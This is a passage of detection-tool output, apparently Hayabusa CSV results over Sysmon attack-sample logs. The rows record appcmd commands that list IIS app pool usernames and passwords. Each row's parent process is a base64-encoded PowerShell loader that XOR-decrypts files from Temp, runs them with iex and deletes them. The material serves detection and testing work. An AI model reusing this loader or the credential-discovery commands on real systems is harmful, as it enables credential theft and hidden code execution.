365ABB72-3D6E-5CEB-0000-00108C8EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBj